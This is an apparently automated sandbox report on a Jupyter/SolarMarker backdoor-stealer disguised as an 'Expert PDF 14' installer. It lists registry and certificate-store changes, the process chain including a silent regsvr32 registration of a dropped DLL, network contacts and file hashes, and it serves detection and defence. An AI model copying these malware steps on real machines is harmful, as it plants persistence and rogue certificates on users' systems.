Malware Analysis Report

2024-10-16 02:55

Sample ID 230317-wq7flsbe3s
Target 07d8c9f5-af55-421d-9023-7932ab1810d7
SHA256 07e3113b6d2367f8fab4668b46620fd6b6d15d0c3d21d4f066cedb8c54340e4b
Tags
jupyter backdoor stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

07e3113b6d2367f8fab4668b46620fd6b6d15d0c3d21d4f066cedb8c54340e4b

Threat Level: Known bad

The file 07d8c9f5-af55-421d-9023-7932ab1810d7 was found to be: Known bad.

Malicious Activity Summary

jupyter backdoor stealer trojan

Jupyter, SolarMarker

Blocklisted process makes network request

Executes dropped EXE

Loads dropped DLL

Checks computer location settings

Enumerates physical storage devices

Modifies registry class

Suspicious use of AdjustPrivilegeToken

NTFS ADS

Modifies system certificate store

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-03-17 18:08

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-03-17 18:08

Reported

2023-03-17 18:44

Platform

win7-20230220-en

Max time kernel

1621s

Max time network

1758s

Command Line

"C:\Users\Admin\AppData\Local\Temp\07d8c9f5-af55-421d-9023-7932ab1810d7.exe"

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6551F56D-61A4-48C1-A4E5-BD05B56AF5A4} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6551F56D-61A4-48C1-A4E5-BD05B56AF5A4}\ = "IOfferItemModule" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{356EF9DF-D3FE-4DA6-9EF9-B29CEF99A571}\AppID = "{D512BD03-0077-4504-AE19-566B43F44E19}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37172CF3-167C-4B55-B02D-3604464210DF}\Version C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{88395ED4-CB15-449D-AA03-0286C132147C}\ProxyStubClsid32 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{218B615C-5E29-4735-A0B5-3D1DA8EE95A0}\ProxyStubClsid32 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F8CBFADD-0796-4046-9D10-B846E0118879}\AppID = "{D512BD03-0077-4504-AE19-566B43F44E19}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{8BEE0069-45C2-4403-B726-50CF8288DDD2} C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FF8AE410-AE4C-42F6-AE76-8AFF4BAA4877} C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{8BEE0069-45C2-4403-B726-50CF8288DDD2}\ProxyStubClsid32 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{E879C546-B160-435A-AC8D-2C8720BDE1F5}\TypeLib\ = "{5187AFD5-7B57-4E74-B36B-8425B39D6ED1}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{AB369CC1-15D6-47B3-B7CA-3061B7DB8E2B}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{FF8AE410-AE4C-42F6-AE76-8AFF4BAA4877}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F73F2CD9-8FD0-419C-9BD8-3CD10A82E263}\TypeLib\ = "{5187AFD5-7B57-4E74-B36B-8425B39D6ED1}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{B3B61C79-2B42-4F76-BACE-44D020AD685C}\ = "IXMLSave" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{E879C546-B160-435A-AC8D-2C8720BDE1F5}\ProxyStubClsid32 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{8BEE0069-45C2-4403-B726-50CF8288DDD2}\ = "IInstallItemExternalApp" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{74A6753A-DE17-4161-BBF1-F930444A667A}\ProxyStubClsid32 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{0BBD5633-4BE2-42D0-BB7E-A021DF1E1753} C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{54D1BE8B-911E-4F28-BC0D-E7545D5FD83B} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{7AE953E8-514E-4210-A41A-B6ACE120EC12}\AppID = "{D512BD03-0077-4504-AE19-566B43F44E19}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{066D076C-674B-477C-A219-17FE4B04FE7D}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{B3B61C79-2B42-4F76-BACE-44D020AD685C}\TypeLib\ = "{5187AFD5-7B57-4E74-B36B-8425B39D6ED1}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{AC45A346-0197-4696-8D32-758EC0B0E4DF}\TypeLib\ = "{5187AFD5-7B57-4E74-B36B-8425B39D6ED1}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{7AE953E8-514E-4210-A41A-B6ACE120EC12} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{35164189-3FA8-48B4-95BA-C80602939FE9}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{066D076C-674B-477C-A219-17FE4B04FE7D}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F73F2CD9-8FD0-419C-9BD8-3CD10A82E263}\ = "GeoIpStruct Class" C:\Windows\SysWOW64\regsvr32.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{05B3D680-372E-48F5-9017-2CB60FAE4FBD}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{CA5A508D-5E26-4167-9871-E1686FB231F5}\TypeLib\ = "{5187AFD5-7B57-4E74-B36B-8425B39D6ED1}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{218B615C-5E29-4735-A0B5-3D1DA8EE95A0}\ProxyStubClsid32 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{E879C546-B160-435A-AC8D-2C8720BDE1F5}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6551F56D-61A4-48C1-A4E5-BD05B56AF5A4}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{FE57A243-877C-4861-85D0-1FC8EA65CEA6}\AppID = "{D512BD03-0077-4504-AE19-566B43F44E19}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{EC5ECDA9-D4FF-4B92-A8E4-BB343310AD6F}\ProxyStubClsid32 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{883556F2-137D-42B1-A379-EF040DB83897} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E66B52BF-144D-4611-9366-62C9B3A3BD0B}\TypeLib\ = "{5187AFD5-7B57-4E74-B36B-8425B39D6ED1}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{69B200C5-B71E-43C7-8807-B4D7285D0804}\InprocServer32 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{AC45A346-0197-4696-8D32-758EC0B0E4DF}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{218B615C-5E29-4735-A0B5-3D1DA8EE95A0}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{35164189-3FA8-48B4-95BA-C80602939FE9}\TypeLib\ = "{5187AFD5-7B57-4E74-B36B-8425B39D6ED1}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{45B9EEC4-462E-427D-B2AA-26380735AE7A}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{883556F2-137D-42B1-A379-EF040DB83897}\TypeLib\Version = "1.0" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{7E39BBB2-F9C5-488C-AC6C-DAA3EFFA4CE1}\TypeLib\Version = "1.0" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{27DC8C77-EEBE-4533-9845-ABD40CEB455F}\InprocServer32 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{05B3D680-372E-48F5-9017-2CB60FAE4FBD}\AppID = "{D512BD03-0077-4504-AE19-566B43F44E19}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{FE57A243-877C-4861-85D0-1FC8EA65CEA6}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{69B200C5-B71E-43C7-8807-B4D7285D0804}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{CA5A508D-5E26-4167-9871-E1686FB231F5}\ = "IStartDataStruct" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{45B9EEC4-462E-427D-B2AA-26380735AE7A}\TypeLib\Version = "1.0" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{4149D4DA-11AA-4597-9AA5-A6E3DCD8DFB3}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{218B615C-5E29-4735-A0B5-3D1DA8EE95A0} C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0DE91E75-5D98-4F96-9C80-2AABD69C8130}\InprocServer32 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{356EF9DF-D3FE-4DA6-9EF9-B29CEF99A571} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CF8D15E0-84AC-4108-A158-348EEBA6C2FC}\ = "OfferItemModule Class" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{7D9D9D34-5DD0-425D-B577-29D2DB57DC90}\Version\ = "1.0" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E879C546-B160-435A-AC8D-2C8720BDE1F5}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{8BEE0069-45C2-4403-B726-50CF8288DDD2}\TypeLib\Version = "1.0" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{A299F69F-9A31-485B-9743-F015326A9B0D}\ProxyStubClsid32 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\AppID\{7F22E8EC-E952-440A-B440-83EB81854969} C:\Users\Admin\AppData\Local\Temp\is-C4ADO.tmp\Expert_PDF.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{414EF0A6-C5A0-4C61-8FA5-A0F1CB29B26F} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0DE91E75-5D98-4F96-9C80-2AABD69C8130}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37172CF3-167C-4B55-B02D-3604464210DF}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{8E73C958-23B4-45B5-8B8C-346ACA41C9FC}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\SystemCertificates\CA\Certificates\D89E3BD43D5D909B47A18977AA9D5CE36CEE184C C:\Users\Admin\AppData\Local\Temp\is-C4ADO.tmp\Expert_PDF.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\SystemCertificates\CA\Certificates\D89E3BD43D5D909B47A18977AA9D5CE36CEE184C\Blob = (certificate blob omitted) C:\Users\Admin\AppData\Local\Temp\is-C4ADO.tmp\Expert_PDF.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B C:\Users\Admin\AppData\Local\Temp\is-C4ADO.tmp\Expert_PDF.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B\Blob = (certificate blob omitted) C:\Users\Admin\AppData\Local\Temp\is-C4ADO.tmp\Expert_PDF.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\is-C4ADO.tmp\Expert_PDF.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (certificate blob omitted) C:\Users\Admin\AppData\Local\Temp\is-C4ADO.tmp\Expert_PDF.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-C4ADO.tmp\Expert_PDF.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1768 wrote to memory of 1372 (7 events) N/A C:\Users\Admin\AppData\Local\Temp\07d8c9f5-af55-421d-9023-7932ab1810d7.exe C:\Users\Admin\AppData\Local\Temp\is-IBLA6.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp
PID 1372 wrote to memory of 580 (7 events) N/A C:\Users\Admin\AppData\Local\Temp\is-IBLA6.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp C:\Users\Admin\AppData\Local\Temp\is-C4ADO.tmp\Expert_PDF.exe
PID 580 wrote to memory of 568 (7 events) N/A C:\Users\Admin\AppData\Local\Temp\is-C4ADO.tmp\Expert_PDF.exe C:\Windows\SysWOW64\regsvr32.exe

Processes

C:\Users\Admin\AppData\Local\Temp\07d8c9f5-af55-421d-9023-7932ab1810d7.exe

"C:\Users\Admin\AppData\Local\Temp\07d8c9f5-af55-421d-9023-7932ab1810d7.exe"

C:\Users\Admin\AppData\Local\Temp\is-IBLA6.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp

"C:\Users\Admin\AppData\Local\Temp\is-IBLA6.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp" /SL5="$70122,111680340,999424,C:\Users\Admin\AppData\Local\Temp\07d8c9f5-af55-421d-9023-7932ab1810d7.exe"

C:\Users\Admin\AppData\Local\Temp\is-C4ADO.tmp\Expert_PDF.exe

"C:\Users\Admin\AppData\Local\Temp\is-C4ADO.tmp\Expert_PDF.exe"

C:\Windows\SysWOW64\regsvr32.exe

regsvr32.exe /s "C:\ProgramData\Expert PDF 14\Installation\Statistics.dll"

C:\Windows\SysWOW64\DllHost.exe

C:\Windows\SysWOW64\DllHost.exe /Processid:{D512BD03-0077-4504-AE19-566B43F44E19}

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

Network

Country Destination Domain Proto
US 8.8.8.8:53 api-updateservice.expert-pdf.com udp
CA 64.15.159.225:443 api-updateservice.expert-pdf.com tcp
US 8.8.8.8:53 wsgeoip.expert-pdf.com udp
CA 64.15.159.225:443 wsgeoip.expert-pdf.com tcp

Files

memory/1768-54-0x0000000000400000-0x0000000000501000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-IBLA6.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp

MD5 a95712856401dda069ee07c719bdb2ab
SHA1 73293e45116e0930d78087741016cde920922a74
SHA256 b4878d6b9d7462cafe81d20da148a44750aa707f4e34eae1f23f21f9e0d9afa0
SHA512 2ea973307830b193379a0b7698682bfecdfcc6bab685dcf60af1c23c94b16b862924148a2f9e8b2ac2b7734c3552193dc0459c7961ab8730b0282101fa22ff85

C:\Users\Admin\AppData\Local\Temp\is-IBLA6.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp

MD5 a95712856401dda069ee07c719bdb2ab
SHA1 73293e45116e0930d78087741016cde920922a74
SHA256 b4878d6b9d7462cafe81d20da148a44750aa707f4e34eae1f23f21f9e0d9afa0
SHA512 2ea973307830b193379a0b7698682bfecdfcc6bab685dcf60af1c23c94b16b862924148a2f9e8b2ac2b7734c3552193dc0459c7961ab8730b0282101fa22ff85

\Users\Admin\AppData\Local\Temp\is-C4ADO.tmp\_isetup\_isdecmp.dll

MD5 c6ae924ad02500284f7e4efa11fa7cfc
SHA1 2a7770b473b0a7dc9a331d017297ff5af400fed8
SHA256 31d04c1e4bfdfa34704c142fa98f80c0a3076e4b312d6ada57c4be9d9c7dcf26
SHA512 f321e4820b39d1642fc43bf1055471a323edcc0c4cbd3ddd5ad26a7b28c4fb9fc4e57c00ae7819a4f45a3e0bb9c7baa0ba19c3ceedacf38b911cdf625aa7ddae

memory/1372-66-0x00000000001E0000-0x00000000001E1000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-C4ADO.tmp\Expert_PDF.exe

MD5 440d4f0c478b77d0e1a95e8165dfb650
SHA1 d8cd10e080167a93273a6969b61648ce9b9debb2
SHA256 19834ba63fc5f104f81d991a93593acde4bb49c10883e66344b8797caf4a5462
SHA512 a8c0b99c9f7f64ad440dd640f5e00b471514fd322af565796dd8fac8b4aabb693ccbcf1698e7082a3e1e188ead68081db13197555ba6b1ff5ef1dbc7b32bbbc5

C:\Users\Admin\AppData\Local\Temp\is-C4ADO.tmp\Expert_PDF.exe

MD5 440d4f0c478b77d0e1a95e8165dfb650
SHA1 d8cd10e080167a93273a6969b61648ce9b9debb2
SHA256 19834ba63fc5f104f81d991a93593acde4bb49c10883e66344b8797caf4a5462
SHA512 a8c0b99c9f7f64ad440dd640f5e00b471514fd322af565796dd8fac8b4aabb693ccbcf1698e7082a3e1e188ead68081db13197555ba6b1ff5ef1dbc7b32bbbc5

memory/1372-81-0x0000000000400000-0x0000000000723000-memory.dmp

memory/1768-83-0x0000000000400000-0x0000000000501000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Cab409C.tmp

MD5 fc4666cbca561e864e7fdf883a9e6661
SHA1 2f8d6094c7a34bf12ea0bbf0d51ee9c5bb7939a5
SHA256 10f3deb6c452d749a7451b5d065f4c0449737e5ee8a44f4d15844b503141e65b
SHA512 c71f54b571e01f247f072be4bbebdf5d8410b67eb79a61e7e0d9853fe857ab9bd12f53e6af3394b935560178107291fc4be351b27deb388eba90ba949633d57d

C:\Users\Admin\AppData\Local\Temp\Tar4198.tmp

MD5 73b4b714b42fc9a6aaefd0ae59adb009
SHA1 efdaffd5b0ad21913d22001d91bf6c19ecb4ac41
SHA256 c0cf8cc04c34b5b80a2d86ad0eafb2dd71436f070c86b0321fba0201879625fd
SHA512 73af3c51b15f89237552b1718bef21fd80788fa416bab2cb2e7fb3a60d56249a716eda0d2dd68ab643752272640e7eaaaf57ce64bcb38373ddc3d035fb8d57cd

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 e71c8443ae0bc2e282c73faead0a6dd3
SHA1 0c110c1b01e68edfacaeae64781a37b1995fa94b
SHA256 95b0a5acc5bf70d3abdfd091d0c9f9063aa4fde65bd34dbf16786082e1992e72
SHA512 b38458c7fa2825afb72794f374827403d5946b1132e136a0ce075dfd351277cf7d957c88dc8a1e4adc3bcae1fa8010dae3831e268e910d517691de24326391a6

C:\Users\Admin\AppData\Local\Temp\Tar4392.tmp

MD5 be2bec6e8c5653136d3e72fe53c98aa3
SHA1 a8182d6db17c14671c3d5766c72e58d87c0810de
SHA256 1919aab2a820642490169bdc4e88bd1189e22f83e7498bf8ebdfb62ec7d843fd
SHA512 0d1424ccdf0d53faf3f4e13d534e12f22388648aa4c23edbc503801e3c96b7f73c7999b760b5bef4b5e9dd923dffe21a21889b1ce836dd428420bf0f4f5327ff

C:\ProgramData\Expert PDF 14\Installation\Statistics.dll

MD5 e645ca01c01f9f8489c07a6b41fbd318
SHA1 3e8ea394f6605bd8529c58a143f01675adee371a
SHA256 a9145b41491019af4e89c5736c0d9d1fc83ab9786ec3dfb27da9be4e40cff27e
SHA512 c220bd620f03f38286899ed124abde69ed0812c2c1ef84031a02abd39faa4975255bc6a2bff8900d0294ac2f508344131be8cc6d8765aa46d430a135bb1af2b6

\ProgramData\Expert PDF 14\Installation\Statistics.dll

MD5 e645ca01c01f9f8489c07a6b41fbd318
SHA1 3e8ea394f6605bd8529c58a143f01675adee371a
SHA256 a9145b41491019af4e89c5736c0d9d1fc83ab9786ec3dfb27da9be4e40cff27e
SHA512 c220bd620f03f38286899ed124abde69ed0812c2c1ef84031a02abd39faa4975255bc6a2bff8900d0294ac2f508344131be8cc6d8765aa46d430a135bb1af2b6

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 acc795abc9374d0e5f0a3b9bba4d81b6
SHA1 6752858c95e9aa95ba51d367eb098fd4caea3766
SHA256 2a2106f5ec627952e4dafc37f1c6e0bbd1abeb6633d2aec13c48f92e2b4e7aac
SHA512 e6ffb0f51858ba10d4dc5da6ad2b44015ed9deed7b3fdd9f0e4e2f40be7f5fe8805e80f0c1e2727a5a33d9298524321a330c95b3f8949d3790f86737bb9b0970

Analysis: behavioral2

Detonation Overview

Submitted

2023-03-17 18:08

Reported

2023-03-17 18:35

Platform

win10v2004-20230220-en

Max time kernel

1218s

Max time network

1234s

Command Line

"C:\Users\Admin\AppData\Local\Temp\07d8c9f5-af55-421d-9023-7932ab1810d7.exe"

Signatures

Jupyter, SolarMarker

backdoor trojan stealer jupyter

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\is-AB559.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{74A6753A-DE17-4161-BBF1-F930444A667A}\ = "IDownloadItemExternalApp" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{6C789195-CB9C-4503-B896-76E5A1D9D0D0}\TypeLib\Version = "1.0" C:\ProgramData\Expert PDF 14\Installation\Expert_PDF_14_Installer.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{7D9D9D34-5DD0-425D-B577-29D2DB57DC90}\Version\ = "1.0" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{EC5ECDA9-D4FF-4B92-A8E4-BB343310AD6F}\ProxyStubClsid32 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{8BEE0069-45C2-4403-B726-50CF8288DDD2}\ = "IInstallItemExternalApp" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{7E39BBB2-F9C5-488C-AC6C-DAA3EFFA4CE1}\TypeLib\Version = "1.0" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1410AE4F-1218-4A9F-87D9-666B1DB82FF1}\LocalizedString = "@%programdata%\\Expert PDF 14\\Installation\\Statistics.dll,-127" C:\ProgramData\Expert PDF 14\Installation\Expert_PDF_14_Installer.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{6C789195-CB9C-4503-B896-76E5A1D9D0D0}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\ProgramData\Expert PDF 14\Installation\Expert_PDF_14_Installer.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{05B3D680-372E-48F5-9017-2CB60FAE4FBD}\InprocServer32 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{05B3D680-372E-48F5-9017-2CB60FAE4FBD}\InprocServer32\ = "C:\\ProgramData\\Expert PDF 14\\Installation\\Statistics.dll" C:\Windows\SysWOW64\regsvr32.exe N/A
